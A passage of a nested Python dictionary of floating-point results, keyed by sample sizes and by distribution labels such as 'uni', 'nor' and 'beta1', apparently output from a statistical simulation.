0.03555977512406705}, 500: {'uni': 0.05494057158528598, 'nor': 0.1057676067326096, 'beta1': 0.05445336207397927, 'beta2': 0.1055765017477942, 'beta4': 0.043998042119070546}, 400: {'uni': 0.060969026310390834, 'nor': 0.10945271980173626, 'beta1': 0.061077517258748326, 'beta2': 0.1099056389579467, 'beta4': 0.04942638750338929}, 300: {'uni': 0.07012941993226982, 'nor': 0.11595846348507075, 'beta1': 0.07039222027455194, 'beta2': 0.11738385669726281, 'beta4': 0.057678877694784}, 200: {'uni': 0.08638646649234194, 'nor': 0.126890208298988, 'beta1': 0.08609870986026835, 'beta2': 0.1293273654437882, 'beta4': 0.07214722508101312}, 150: {'uni': 0.09903143295834599, 'nor': 0.13569255431524507, 'beta1': 0.0986204644618468, 'beta2': 0.1383759438633969, 'beta4': 0.08472012631786002}, 100: {'uni': 0.12042784597491996, 'nor': 0.1538654219813379, 'beta1': 0.12047443267408167, 'beta2': 0.15479064845781504, 'beta4': 0.10572696956038574}, 75: {'uni': 0.13830413084922855, 'nor': 0.16929639027614796, 'beta1': 0.1387890089056115, 'beta2': 0.16973078116853618, 'beta4': 0.12418040490595178}, 50: {'uni': 0.16830423148890084, 'nor': 0.1942891319284309, 'beta1': 0.16984574641040717, 'beta2': 0.19571354576291627, 'beta4': 0.15658953127105207}, 30: {'uni': 0.21781307361797006, 'nor': 0.23824445270348382, 'beta1': 0.21900666049148654, 'beta2': 0.23923389502771286, 'beta4': 0.20443259848465625}, 20: {'uni': 0.2619095049476788, 'nor': 0.2830118442439754, 'beta1': 0.26563000767153383, 'beta2': 0.281971996905995, 'beta4': 0.25388919785330466}, 10: {'uni': 0.3685724124734001, 'nor': 0.38033611275896406, 'beta1': 0.3703883643155905, 'beta2': 0.3794242112561502, 'beta4': 0.3585528364829571}}, 50: {1000: {'uni': 0.04077866659121632, 'nor': 0.11580496049799294, 'beta1': 0.03853944253374597, 'beta2': 0.10586786875499299, 'beta4': 0.03023595571004084}, 750: {'uni': 0.04664929426958103, 'nor': 0.11784347998818245, 'beta1': 0.04458588264014807, 'beta2': 0.10969638470331955, 'beta4': 0.03498175243961467}, 500: {'uni': 0.05599120254346879, 'nor': 0.1227826762822789, 'beta1': 0.05467291714710451, 'beta2': 0.11556286804274307, 'beta4': 0.04331548807386715}, 400: {'uni': 0.0618059390475908, 'nor': 0.12716067908984624, 'beta1': 0.06076018571852698, 'beta2': 0.11944923182949141, 'beta4': 0.048733808094156394}, 300: {'uni': 0.07145474332507373, 'nor': 0.13215808532037732, 'beta1': 0.07005566740115332, 'beta2': 0.12493758821402545, 'beta4': 0.05655427961943388}, 200: {'uni': 0.08649126875588486, 'nor': 0.14398532562620858, 'beta1': 0.08564125071746342, 'beta2': 0.13571236054952152, 'beta4': 0.07038554117278428}, 150: {'uni': 0.09972216582225901, 'nor': 0.15081713302440228, 'beta1': 0.0980320332573475, 'beta2': 0.14532447093659528, 'beta4': 0.08274587331420269}, 100: {'uni': 0.12039381304129049, 'nor': 0.16746812959278995, 'beta1': 0.12027519702689837, 'beta2': 0.16277345040644908, 'beta4': 0.10360078281945007}, 75: {'uni': 0.13935366553924022, 'nor': 0.18277769750800105, 'beta1': 0.13931147415294898, 'beta2': 0.17557555907632716, 'beta4': 0.120496470943599}, 50: {'uni': 0.17045968935190703, 'nor': 0.2061624163310195, 'beta1': 0.16850089401261617, 'beta2': 0.20076750567324442, 'beta4': 0.1524439268490353}, 30: {'uni': 0.21706058239993287, 'nor': 0.24724662889782345, 'beta1': 0.21628695050401275, 'beta2': 0.2432570996508593, 'beta4': 0.2007074069679156}, 20: {'uni': 0.2644244349370678, 'nor': 0.2888841367890824, 'beta1': 0.2655430776294785, 'beta2': 0.2844954992477471, 'beta4': 0.24845905058828244}, 10: {'uni': 0.3691891891585487, 'nor': 0.38713991936611614, 'beta1': 0.36692723160862345, 'beta2': 0.38140488493099745, 'beta4': 0.3576454464109796}}, 30: {1000: {'uni': 0.045457677191963586, 'nor': 0.1457355582484376, 'beta1': 0.038546756955813, 'beta2': 0.1200679160771897, 'beta4': 0.030100677632104778}, 750: {'uni': 0.04995866353212569, 'nor': 0.14761791285414627, 'beta1': 0.044554754363745674, 'beta2': 0.12224473120434098, 'beta4': 0.03495775636349063}, 500: {'uni': 0.05880880623556495, 'nor': 0.15281360983908227, 'beta1': 0.05437068025855424, 'beta2': 0.12753056289514525, 'beta4': 0.0428449240771841}, 400: {'uni': 0.0645126168303099, 'nor': 0.15525355878197838, 'beta1': 0.061035794772328456, 'beta2': 0.1318918900818361, 'beta4': 0.048131670902745394}, 300: {'uni': 0.0736981524234896, 'nor': 0.16102927114194954, 'beta1': 0.0699378076866422, 'beta2': 0.1359450077822285, 'beta4': 0.055744371538938964}, 200: {'uni': 0.08801073759496875, 'nor': 0.16994023103299272, 'beta1': 0.08505228657724262, 'beta2': 0.1463769299335057, 'beta4': 0.06912750948895652}, 150: {'uni': 0.10119998770539862, 'nor': 0.17809227114576442, 'beta1': 0.09846662120153019, 'beta2': 0.1563069707446343, 'beta4': 0.0804849907703572}, 100: {'uni': 0.12165160638390676, 'nor': 0.1925681843339241, 'beta1': 0.12041960699493481, 'beta2': 0.17156822159027985, 'beta4': 0.10014130433781748}, 75: {'uni': 0.13975451811748224, 'nor': 0.2056309659993777, 'beta1': 0.13866205873705784, 'beta2': 0.1837990537785728, 'beta4': 0.11619303536405938}, 50: {'uni': 0.1707628459531228, 'nor': 0.22834518013555266, 'beta1': 0.16826103008208187, 'beta2': 0.20898788453415473, 'beta4': 0.1459501849665349}, 30: {'uni': 0.21737854401306778, 'nor': 0.2651944679135494, 'beta1': 0.2169374533538973, 'beta2': 0.24814946824995282, 'beta4': 0.19477597502585953}, 20: {'uni': 0.26172292368747657, 'nor': 0.30251728219002344, 'beta1': 0.2644484410276723, 'beta2': 0.29110454324712, 'beta4': 0.24126464705741385}, 10: {'uni': 0.3667581652322965, 'nor': 0.40279126451218983, 'beta1': 0.3692768516896085, 'beta2': 0.3866633789743732, 'beta4': 0.34861300659940814}}, 20: {1000: {'uni': 0.05370924654054801, 'nor': 0.17648599487397, 'beta1': 0.04804540228549625, 'beta2': 0.1343446649365414, 'beta4': 0.02997352312939844}, 750: {'uni': 0.05729122370623074, 'nor': 0.1803587541418622, 'beta1': 0.04812500176891543, 'beta2': 0.13786905650664827, 'beta4': 0.03477191515013617}, 500: {'uni': 0.06464930552073, 'nor': 0.18336329212636393, 'beta1': 0.05469422873209995, 'beta2': 0.14239511606905197, 'beta4': 0.04271981408076597}, 400: {'uni': 0.06986628923619037, 'nor': 0.18625313891095058, 'beta1': 0.06071158332876331, 'beta2': 0.14471049421579463, 'beta4': 0.047627222949097936}, 300: {'uni': 0.0777256622725595, 'nor': 0.18953337250453745, 'beta1': 0.070054764465032, 'beta2': 0.1512744075762968, 'beta4': 0.0552010190871432}, 200: {'uni': 0.09158087111218582, 'nor': 0.19800738103301052, 'beta1': 0.0864137923024384, 'beta2': 0.15931545015663917, 'beta4': 0.06814299912620103}, 150: {'uni': 0.10335435452469321, 'nor': 0.2054309649794448, 'beta1': 0.09892077062896198, 'beta2': 0.16793211210769832, 'beta4': 0.07953126024663426}, 100: {'uni': 0.12424516715196299, 'nor': 0.21856150700189325, 'beta1': 0.12057266069376027, 'beta2': 0.18383332726712043, 'beta4': 0.09738694233698236}, 75: {'uni': 0.1417104597444815, 'nor': 0.23034885885084855, 'beta1': 0.13841928094108402, 'beta2': 0.1968525929870979, 'beta4': 0.1150925954043509}, 50: {'uni': 0.17111110661077933, 'nor': 0.2524518773718313, 'beta1': 0.17046731006299556, 'beta2': 0.21788191331659196, 'beta4': 0.14222869732898685}, 30: {'uni': 0.21687551224414225, 'nor': 0.28926214134356854, 'beta1': 0.21629470859709887, 'beta2': 0.25673815181901094, 'beta4': 0.1892955689821264}, 20: {'uni': 0.26430445397421665, 'nor': 0.3247388087097957, 'beta1': 0.2638148393051306, 'beta2': 0.29743250866558657, 'beta4': 0.23622944016863467}, 10: {'uni': 0.36737909439043254, 'nor': 0.4125208499637192, 'beta1': 0.3660874383968239, 'beta2': 0.38838554766199895, 'beta4': 0.3439063586015456}}, 10: {1000: {'uni': 0.08862146976790009, 'nor': 0.2535995199262815, 'beta1': 0.09069671581521854, 'beta2': 0.16803506355157516, 'beta4': 0.029921859317868282}, 750: {'uni': 0.08977033393809541, 'nor': 0.254580496609131, 'beta1': 0.09071297119014299, 'beta2': 0.1691038026265949, 'beta4': 0.034510090116727565}, 500: {'uni': 0.09238549230306914, 'nor': 0.25987057271300046, 'beta1': 0.09073934473664924, 'beta2': 0.17440911430930217, 'beta4': 0.04213161613017047}, 400: {'uni': 0.09459196287285188, 'nor': 0.26027933684777826, 'beta1': 0.09074209915698388, 'beta2': 0.17593382577625938, 'beta4': 0.04768105187754579}, 300: {'uni': 0.09917712584623528, 'nor': 0.2615501480076419, 'beta1': 0.09091594609476689, 'beta2': 0.1805409357764428, 'beta4': 0.05498060190263093}, 200: {'uni': 0.10872992256114376, 'nor': 0.2695197969164528, 'beta1': 0.09138518619528078, 'beta2': 0.18687142652551247, 'beta4': 0.06740841503327016}, 150: {'uni': 0.11782830618505136, 'nor': 0.2762185043437084, 'beta1': 0.10051161390790297, 'beta2': 0.1942070856751601, 'beta4': 0.07819221056213072}, 100: {'uni': 0.13438399664084844, 'nor': 0.28816303619228323, 'beta1': 0.12084090735087949, 'beta2': 0.20547572552005522, 'beta4': 0.09570415694090936}, 75: {'uni': 0.15023870303077683, 'nor': 0.2958611782293753, 'beta1': 0.1395907599244337, 'beta2': 0.21686046108693185, 'beta4': 0.11050164335769763}, 50: {'uni': 0.1782266716766201, 'nor': 0.3141960877725066, 'beta1': 0.16859036565221908, 'beta2': 0.24007665604305778, 'beta4': 0.13764276895735614}, 30: {'uni': 0.22096576164827378, 'nor': 0.3459767153505968, 'beta1': 0.21633032217123638, 'beta2': 0.27349437174891433, 'beta4': 0.18066617575900545}, 20: {'uni': 0.26383403962743235, 'nor': 0.37594074244986514, 'beta1': 0.26301385683685513, 'beta2': 0.3103976354263712, 'beta4': 0.22515639301084087}, 10: {'uni': 0.3664196082159237, 'nor': 0.45714739810989896, 'beta1': 0.3636555139455243, 'beta2': 0.3974337064021698, 'beta4': 0.3276445784663552}}}, 0.2: {1000: {1000: {'uni': 0.03388738157245541, 'nor': 0.04015666897414438, 'beta1': 0.03355667375414395, 'beta2': 0.055574500180284314, 'beta4': 0.03068120985677973}, 750: {'uni': 0.03899522828726909, 'nor': 0.04482662034784124, 'beta1': 0.038906952257139416, 'beta2': 0.0577336142241367, 'beta4': 0.035726625386190314}, 500: {'uni': 0.047776296371012106, 'nor': 0.0524414607908541, 'beta1': 0.04779122142786796, 'beta2': 0.06290813245562621, 'beta4': 0.04449308639070271}, 400: {'uni': 0.05336721519256357, 'nor': 0.05743278486341408, 'beta1': 0.053125312827925875, 'beta2': 0.06632258983296924, 'beta4': 0.05071787362274782}, 300: {'uni': 0.0613357895908182, 'nor': 0.06550100428584399, 'beta1': 0.06109741329317647, 'beta2': 0.07293163000037511, 'beta4': 0.05908868335670159}, 200: {'uni': 0.07501845542232805, 'nor': 0.07876069039917577, 'beta1': 0.07500276171787268, 'beta2': 0.08419855412256849, 'beta4': 0.07278561303210473}, 150: {'uni': 0.08634506901837877, 'nor': 0.08904521157666112, 'beta1': 0.08632477062450605, 'beta2': 0.09453176706786948, 'beta4': 0.08472926033937267}, 100: {'uni': 0.1057124222050787, 'nor': 0.10808546837916216, 'beta1': 0.10516591278839627, 'beta2': 0.11170808920861064, 'beta4': 0.10393226778652609}, 75: {'uni': 0.12149208320718635, 'nor': 0.12306907509286319, 'beta1': 0.12209431187926248, 'beta2': 0.12646902554095174, 'beta4': 0.12019336772939093}, 50: {'uni': 0.14783464657037992, 'nor': 0.14989562158896733, 'beta1': 0.14870430658867798, 'beta2': 0.15298471478505016, 'beta4': 0.14675275578661956}, 30: {'uni': 0.19121204259605487, 'nor': 0.19161889709583674, 'beta1': 0.18958426307805673, 'beta2': 0.19343552624644, 'beta4': 0.18882942312354808}, 20: {'uni': 0.23271862737098403, 'nor': 0.23131945605660487, 'beta1': 0.23084583243478113, 'beta2': 0.2339139193810307, 'beta4': 0.23046342255270594}, 10: {'uni': 0.3225715177370052, 'nor': 0.32210711594806274, 'beta1': 0.32134895787627404, 'beta2': 0.32533513676914994, 'beta4': 0.32219881278226875}}, 750: {1000: {'uni': 0.03376714362696076, 'nor': 0.042024347317684174, 'beta1': 0.03369092286126596, 'beta2': 0.055889726610143464, 'beta4': 0.03024928592128745}, 750: {'uni': 0.03891496409139339, 'nor': 0.046131807231977684, 'beta1': 0.038847267411021014, 'beta2': 0.05801346441223432, 'beta4': 0.035253753207794225}, 500: {'uni': 0.04749484005992066, 'nor': 0.05359269975534858, 'beta1': 0.04758858015566003, 'beta2': 0.06257170586617439, 'beta4': 0.044068141367767266}, 400: {'uni': 0.05297468125525839, 'nor': 0.05926387355580798, 'beta1': 0.05295355833022475, 'beta2': 0.0666115313485337, 'beta4': 0.04992787350991934}, 300: {'uni': 0.06112594909603697, 'nor': 0.06629753648545333, 'beta1': 0.06138650353983818, 'beta2': 0.07343192849203295, 'beta4': 0.05810524207749168}, 200: {'uni': 0.07490063551528908, 'nor': 0.07942685260233576, 'beta1': 0.07438999529385071, 'beta2': 0.08515842923668693, 'beta4': 0.07205056427377587}, 150: {'uni': 0.08639622501196301, 'nor': 0.08962430009180156, 'beta1': 0.08575239384506436, 'beta2': 0.09486183374614099, 'beta4': 0.0835611646348291}, 100: {'uni': 0.10581425933251165, 'nor': 0.10810039846104558, 'beta1': 0.10589792403845494, 'beta2': 0.11188037819837482, 'beta4': 0.10306934411821278}, 75: {'uni': 0.1214540209799046, 'nor': 0.12485134735341119, 'beta1': 0.12141611216283932, 'beta2': 0.12662789787139295, 'beta4': 0.11982036085184888}, 50: {'uni': 0.14841865927342057, 'nor': 0.15115605407635108, 'beta1': 0.14882335320078816, 'beta2': 0.15301035196557927, 'beta4': 0.14740389167526288}, 30: {'uni': 0.19055206451646386, 'nor': 0.19229401661443357, 'beta1': 0.19006065116918158, 'beta2': 0.19466607401258693, 'beta4': 0.18866007451684785}, 20: {'uni': 0.23100251462520283, 'nor': 0.23351937614410023, 'beta1': 0.23055792133077502, 'beta2': 0.23429666500235652, 'beta4': 0.23068072631463016}, 10: {'uni': 0.321735912802274, 'nor': 0.32423692759003264, 'beta1': 0.3239617966140733, 'beta2': 0.32437308055517045, 'beta4': 0.3249136529859552}}, 500: {1000: {'uni': 0.03361099658500921, 'nor': 0.045330398129452165, 'beta1': 0.03371228816752819, 'beta2': 0.05832511086354275, 'beta4': 0.029273019646634646}, 750: {'uni': 0.038816575943483644, 'nor': 0.0491504214333881, 'beta1': 0.039015892770372096, 'beta2': 0.060770948426164983, 'beta4': 0.034501276617158405}, 500: {'uni': 0.04815961880455866, 'nor': 0.05646388049918538, 'beta1': 0.047616095765788624, 'beta2': 0.06578607920387605, 'beta4': 0.043089689535904585}, 400: {'uni': 0.053452201672102295, 'nor': 0.06153375349484047, 'beta1': 0.052983040292405525, 'beta2': 0.07031702338528978, 'beta4': 0.048637574479821644}, 300: {'uni': 0.06127370649997177, 'nor': 0.06874638836387548, 'beta1': 0.06133068039745698, 'beta2': 0.07561704434900895, 'beta4': 0.057273437560509066}, 200: {'uni': 0.07472226953381489, 'nor': 0.08105755495025313, 'beta1': 0.07504375951495804, 'beta2': 0.0877176493907923, 'beta4': 0.07144906208708657}, 150: {'uni': 0.08655826756432694, 'nor': 0.09209107605088962, 'beta1': 0.08700099545101375, 'beta2': 0.09953347989595823, 'beta4': 0.08270140680266824}, 100: {'uni': 0.10589569548753086, 'nor': 0.11067808441589783, 'beta1': 0.10570360745340612, 'beta2': 0.11521549542004672, 'beta4': 0.10204817369562785}, 75: {'uni': 0.1214238464236953, 'nor': 0.1257918905040879, 'beta1': 0.12201308622504331, 'beta2': 0.12918412209535224, 'beta4': 0.1184359299309477}, 50: {'uni': 0.14801176067778704, 'nor': 0.15169848925285823, 'beta1': 0.1490310518112693, 'beta2': 0.15460147219717485, 'beta4': 0.14566535210883857}, 30: {'uni': 0.19132874999388066, 'nor': 0.19329023907863613, 'beta1': 0.1907485547222172, 'beta2': 0.1941783283376482, 'beta4': 0.18736708420254317}, 20: {'uni': 0.23282248165413844, 'nor': 0.232655718238027, 'beta1': 0.23254110249310414, 'beta2': 0.23479815552622696, 'beta4': 0.22895872572703413}, 10: {'uni': 0.3238030709255784, 'nor': 0.32527484356803527, 'beta1': 0.32251033930915673, 'beta2': 0.325462541104486, 'beta4': 0.3216777112141702}}, 400: {1000: {'uni': 0.03386042788512955, 'nor': 0.047710828017344276, 'beta1': 0.0337310904928686, 'beta2': 0.05890009367362975, 'beta4': 0.029040534438643628}, 750: {'uni': 0.03904468308757758, 'nor': 0.051551219035761986, 'beta1': 0.03885610324170258, 'beta2': 0.0606985856416401, 'beta4': 0.0340554853290308}, 500: {'uni': 0.047602093704168735, 'nor': 0.05814584365187403, 'beta1': 0.04748869924936838, 'beta2': 0.06611742375228202, 'beta4': 0.04271018009250971}, 400: {'uni': 0.05304223077370851, 'nor': 0.06292081768546079, 'beta1': 0.05279164279598325, 'beta2': 0.07002077573100743, 'beta4': 0.04866770038722679}, 300: {'uni': 0.06141397119642633, 'nor': 0.07030627117167121, 'beta1': 0.06097126432087274, 'beta2': 0.07635636078134611, 'beta4': 0.056339224324690684}, 200: {'uni': 0.07503889889243953, 'nor': 0.08238702118585328, 'beta1': 0.07494642001255589, 'beta2': 0.08906360121274909, 'beta4': 0.07041606833950242}, 150: {'uni': 0.08650534294392143, 'nor': 0.09368577651895194, 'beta1': 0.08609035232292472, 'beta2': 0.09880346197322298, 'beta4': 0.08192514174926191}, 100: {'uni': 0.10554211559941079, 'nor': 0.11085547265078599, 'beta1': 0.10592424086268526, 'beta2': 0.11560686173795065, 'beta4': 0.10181407800596476}, 75: {'uni': 0.12118585486438052, 'nor': 0.12734779642511718, 'beta1': 0.12111707280276551, 'beta2': 0.1305965998046278, 'beta4': 0.11787930087738932}, 50: {'uni': 0.14797599649230353, 'nor': 0.15171514649116935, 'beta1': 0.1484099702342504, 'beta2': 0.15541609636822673, 'beta4': 0.14510227576798918}, 30: {'uni': 0.19021549568018936, 'nor': 0.1933618553897194, 'beta1': 0.1907191702304276, 'beta2': 0.19541117767136984, 'beta4': 0.18755377058130973}, 20: {'uni': 0.23146197858779916, 'nor': 0.23407289720723795, 'beta1': 0.23230655807246425, 'beta2': 0.23567907159586732, 'beta4': 0.2291439538234219}, 10: {'uni': 0.3221026192917168, 'nor': 0.3245602129335199, 'beta1': 0.32277705217495795, 'beta2': 0.3261921289212465, 'beta4': 0.32191737143798144}}, 300: {1000: {'uni': 0.033695118131507495, 'nor': 0.05091916329512536, 'beta1': 0.03393619351717603, 'beta2': 0.06057179016027847, 'beta4': 0.0285990426293512}, 750: {'uni': 0.03910414563500947, 'nor': 0.05465137245133267, 'beta1': 0.038816776120210894, 'beta2': 0.06313897920954847, 'beta4': 0.033354645226166046}, 500: {'uni': 0.04762543649309181, 'nor': 0.06159887019353166, 'beta1': 0.04780391171257714, 'beta2': 0.0681292524818165, 'beta4': 0.04184091667546608}, 400: {'uni': 0.05345378246611335, 'nor': 0.06617151036624425, 'beta1': 0.05302241280194575, 'beta2': 0.07278816401083432, 'beta4': 0.04729132105092715}, 300: {'uni': 0.06133399743947998, 'nor': 0.0731521981557415, 'beta1': 0.061595854882960877, 'beta2': 0.08129842890779082, 'beta4': 0.055524597397617226}, 200: {'uni': 0.07473088765308139, 'nor': 0.0848296423748201, 'beta1': 0.07519297407714975, 'beta2': 0.09105884496116406, 'beta4': 0.06951013639767534}, 150: {'uni': 0.08667661820391337, 'nor': 0.09523718870586606, 'beta1': 0.08692359414490303, 'beta2': 0.10060898747715086, 'beta4': 0.08103195453051082}, 100: {'uni': 0.10553388362967905, 'nor': 0.11381051637354644, 'beta1': 0.10561397962134611, 'beta2': 0.11792834991131423, 'beta4': 0.10090718775359064}, 75: {'uni': 0.12155221095133384, 'nor': 0.12793878242727197, 'beta1': 0.1215592598705928, 'beta2': 0.1322756449085521, 'beta4': 0.1168330578874448}, 50: {'uni': 0.14804683077762326, 'nor': 0.15419659403457153, 'beta1': 0.14866575944705585, 'beta2': 0.15751859961478853, 'beta4': 0.14405280732471298}, 30: {'uni': 0.19026263588328451, 'nor': 0.19412845565379028, 'beta1': 0.19049550527182446, 'beta2': 0.196939457774988, 'beta4': 0.1866360117186579}, 20: {'uni': 0.2313876995850297, 'nor': 0.23502769104830612, 'beta1': 0.23105225723665046, 'beta2': 0.23608963938520033, 'beta4': 0.2292267482273611}, 10: {'uni': 0.3221120205638056, 'nor': 0.3243045336872488, 'beta1': 0.3208731593800577, 'beta2': 0.3252380584126876, 'beta4': 0.31984201603154766}}, 200: {1000: {'uni': 0.03389126620048066, 'nor': 0.05765077575778865, 'beta1': 0.03376008405740816, 'beta2': 0.06437824504169704, 'beta4': 0.0279614561315292}, 750: {'uni': 0.03903612475565288, 'nor': 0.06067305171910875, 'beta1': 0.039025478836297256, 'beta2': 0.06680002944624919, 'beta4': 0.03292291515427731}, 500: {'uni': 0.04775932391254628, 'nor': 0.06680855125140311, 'beta1': 0.04777372167795524, 'beta2': 0.0730432372041967, 'beta4': 0.04099670926553012}, 400: {'uni': 0.053169992426212453, 'nor': 0.07130050098050561, 'beta1': 0.053126182451097015, 'beta2': 0.07958454016209743, 'beta4': 0.046411644412640785}, 300: {'uni': 0.06084117394290545, 'nor': 0.07778044249500193, 'beta1': 0.06160223598764697, 'beta2': 0.08429495593767933, 'beta4': 0.05440016577981527}, 200: {'uni': 0.07486690598932355, 'nor': 0.09015651052130147, 'beta1': 0.0750283211417685, 'beta2': 0.09516934496985152, 'beta4': 0.06768527669021038}, 150: {'uni': 0.08629721643574545, 'nor': 0.0993067628049017, 'beta1': 0.08668817140327162, 'beta2': 0.10516268131208634, 'beta4': 0.07953728925132197}, 100: {'uni': 0.10546884892973363, 'nor': 0.1168548961678525, 'beta1': 0.10626217079796596, 'beta2': 0.1204989099383002, 'beta4': 0.09903875776592275}, 75: {'uni': 0.12168012164046638, 'nor': 0.1314303884963226, 'beta1': 0.12214826537759482, 'beta2': 0.1351994296696919, 'beta4': 0.1149866262333511}, 50: {'uni': 0.14782352233644408, 'nor': 0.15754764223117135, 'beta1': 0.14825063238007496, 'beta2': 0.15841952571485496, 'beta4': 0.14294406590744546}, 30: {'uni': 0.19048227877938156, 'nor': 0.1967417135295928, 'beta1': 0.18997647207879326, 'beta2': 0.1985375655182654, 'beta4': 0.1860365582166873}, 20: {'uni': 0.23118653990494603, 'nor': 0.2362845426246003, 'beta1': 0.23216547900931916, 'beta2': 0.23821825980001504, 'beta4': 0.22782447476862544}, 10: {'uni': 0.3211281593663615, 'nor': 0.32606182576485077, 'beta1': 0.3236233700149418, 'beta2': 0.32878598247569857, 'beta4': 0.3207221077913689}}, 150: {1000: {'uni': 0.03396456507138623, 'nor': 0.0630608330646778, 'beta1': 0.0337277801465099, 'beta2': 0.06770210959513101, 'beta4': 0.02782320511153541}, 750: {'uni': 0.03910044490462494, 'nor': 0.06648103251076115, 'beta1': 0.03880293828339021, 'beta2': 0.07044578061655482, 'beta4': 0.032404976904047755}, 500: {'uni': 0.047957863191993855, 'nor': 0.07218240504190596, 'beta1': 0.04756246411890541, 'beta2': 0.07886065014379595, 'beta4': 0.04025719542113432}, 400: {'uni': 0.05359261424909634, 'nor': 0.07672357193415957, 'beta1': 0.053195230735709365, 'beta2': 0.08232822341436707, 'beta4': 0.045660798052570645}, 300: {'uni': 0.06095634560530494, 'nor': 0.08246385189061045, 'beta1': 0.06158333945371208, 'beta2': 0.08770721726682829, 'beta4': 0.053329443870827636}, 200: {'uni': 0.07542313957478985, 'nor': 0.09376844697035747, 'beta1': 0.07502483861611764, 'beta2': 0.09930331490997918, 'beta4': 0.06676883228264996}, 150: {'uni': 0.08612997994268534, 'nor': 0.10304658085927404, 'beta1': 0.08676278127457426, 'beta2': 0.10801928051315668, 'beta4': 0.07857687034701241}, 100: {'uni': 0.10487250667170855, 'nor': 0.11932842046669623, 'beta1': 0.10614742264977517, 'beta2': 0.1240130501571779, 'beta4': 0.09727175686115075}, 75: {'uni': 0.12125587425148476, 'nor': 0.13477382757210765, 'beta1': 0.12123394920739405, 'beta2': 0.13735136783257884, 'beta4': 0.11414306692306875}, 50: {'uni': 0.14807161438081134, 'nor': 0.15892016658734387, 'beta1': 0.148560766937952, 'beta2': 0.16159831870181401, 'beta4': 0.1417900094042981}, 30: {'uni': 0.18999549214586064, 'nor': 0.19904964098027866, 'beta1': 0.19071102883002822, 'beta2': 0.20019795935043838, 'beta4': 0.18394814557977696}, 20: {'uni': 0.2315147837574712, 'nor': 0.23783415188052248, 'beta1': 0.2324397659800763, 'beta2': 0.23998185635535838, 'beta4': 0.22593857547727642}, 10: {'uni': 0.3219852137932768, 'nor': 0.32723676254678064, 'beta1': 0.32356225696956475, 'beta2': 0.3269691590497776, 'beta4': 0.3198335598449822}}, 100: {1000: {'uni': 0.03411194849559385, 'nor': 0.07287242105906888, 'beta1': 0.03382125829922744, 'beta2': 0.07002374839528969, 'beta4': 0.027407494662168852}, 750: {'uni': 0.03938154082727641, 'nor': 0.07580278019762332, 'beta1': 0.039103170488301364, 'beta2': 0.07321818422715465, 'beta4': 0.03188744748160627}, 500: {'uni': 0.04778928237643254, 'nor': 0.08110701684552524, 'beta1': 0.047810374146142864, 'beta2': 0.08203011864750759, 'beta4': 0.03952324078463222}, 400: {'uni': 0.0534810053390774, 'nor': 0.08508194249549039, 'beta1': 0.05352127702635723, 'beta2': 0.08537754830278577, 'beta4': 0.04481417769901397}, 300: {'uni': 0.06166341110979501, 'nor': 0.09150201948101794, 'beta1': 0.06113077709028425, 'beta2': 0.09038186391687197, 'beta4': 0.05211846493236742}, 200: {'uni': 0.07520911700485444, 'nor': 0.10091005418742754, 'beta1': 0.07506822671283137, 'beta2': 0.10171318740985519, 'beta4': 0.06518371829303138}, 150: {'uni': 0.08676252704286641, 'nor': 0.109975580477785, 'beta1': 0.08644340439225118, 'beta2': 0.11178799632878333, 'beta4': 0.07633395622902756}, 100: {'uni': 0.10629645295984264, 'nor': 0.1258041278664646, 'beta1': 0.10529533439068595, 'beta2': 0.12702981218946555, 'beta4': 0.09569346182437452}, 75: {'uni': 0.12112331247638874, 'nor': 0.14051961004379154, 'beta1': 0.12250367446398408, 'beta2': 0.1419312079891245, 'beta4': 0.11164814343344687}, 50: {'uni': 0.14850915109683305, 'nor': 0.164857883156725, 'beta1': 0.14797844957977346, 'beta2': 0.16537134374996698, 'beta4': 0.13887660533943375}, 30: {'uni': 0.19061314919489092, 'nor': 0.20238067255048653, 'beta1': 0.1898804661221951, 'beta2': 0.2034759671609193, 'beta4': 0.18169040960889707}, 20: {'uni': 0.23206346175230053, 'nor': 0.24178386379175654, 'beta1': 0.2312278955520718, 'beta2': 0.24112122817067416, 'beta4': 0.22539667105811617}, 10: {'uni': 0.3196702240237979, 'nor': 0.33251158834688327, 'beta1': 0.32295889633274955, 'beta2': 0.328393531993296, 'beta4': 0.31666570512538683}}, 75: {1000: {'uni': 0.03485783601744907, 'nor': 0.08051567869925941, 'beta1': 0.033648744067629854, 'beta2': 0.07403441562434876, 'beta4': 0.02718882272100026}, 750: {'uni': 0.039971273861006185, 'nor': 0.08378469794057, 'beta1': 0.03914992626191016, 'beta2': 0.07629409467461495, 'beta4': 0.03167459557515717}, 500: {'uni': 0.04814188204423331, 'nor': 0.08871034088415142, 'beta1': 0.04758674792285417, 'beta2': 0.08541839890028591, 'beta4': 0.03925920431586538}, 400: {'uni': 0.054007658904476896, 'nor': 0.09269490981804712, 'beta1': 0.05325465974697008, 'beta2': 0.08787830915620459, 'beta4': 0.04425711117117276}, 300: {'uni': 0.06166042307350328, 'nor': 0.09814136406424179, 'beta1': 0.06140103113984097, 'beta2': 0.0953246518668952, 'beta4': 0.05161170153868877}, 200: {'uni': 0.07533722846773899, 'nor': 0.1076845305009698, 'beta1': 0.07475323397653444, 'beta2': 0.10614951521713306, 'beta4': 0.06424476858167916}, 150: {'uni': 0.08661147103718747, 'nor': 0.11679904366669902, 'beta1': 0.0862468564230863, 'beta2': 0.11532702446321819, 'beta4': 0.07558718090110728}, 100: {'uni': 0.1052555935603583, 'nor': 0.13183406809273956, 'beta1': 0.10578415846309697, 'beta2': 0.13050924243730755, 'beta4': 0.0937872652849821}, 75: {'uni': 0.12126435398082328, 'nor': 0.14504840369414934, 'beta1': 0.12158416691242752, 'beta2': 0.14424291715318288, 'beta4': 0.11036706757812237}, 50: {'uni': 0.14834069782758857, 'nor': 0.16807773831916928, 'beta1': 0.1488517171705721, 'beta2': 0.16739872482395307, 'beta4': 0.13691632557397643}, 30: {'uni': 0.19058841526927756, 'nor': 0.2065490922203851, 'beta1': 0.1901874541797639, 'beta2': 0.20483694072987557, 'beta4': 0.1806171436449474}, 20: {'uni': 0.23088484153300304, 'nor': 0.24560591918060148, 'beta1': 0.23134779605096323, 'beta2': 0.24365102169836095, 'beta4': 0.22264414971371438}, 10: {'uni': 0.3223581507118726, 'nor': 0.3333247832694408, 'beta1': 0.3216527474966696, 'beta2': 0.33129856873943275, 'beta4': 0.31612481972111983}}, 50: {1000: {'uni': 0.03610852487574101, 'nor': 0.0960874267256373, 'beta1': 0.033752114731624816, 'beta2': 0.0812415823085737, 'beta4': 0.0271620542706206}, 750: {'uni': 0.04093834200462532, 'nor': 0.09793556503751522, 'beta1': 0.03893376090817102, 'beta2': 0.08431844210129946, 'beta4': 0.03135962540422432}, 500: {'uni': 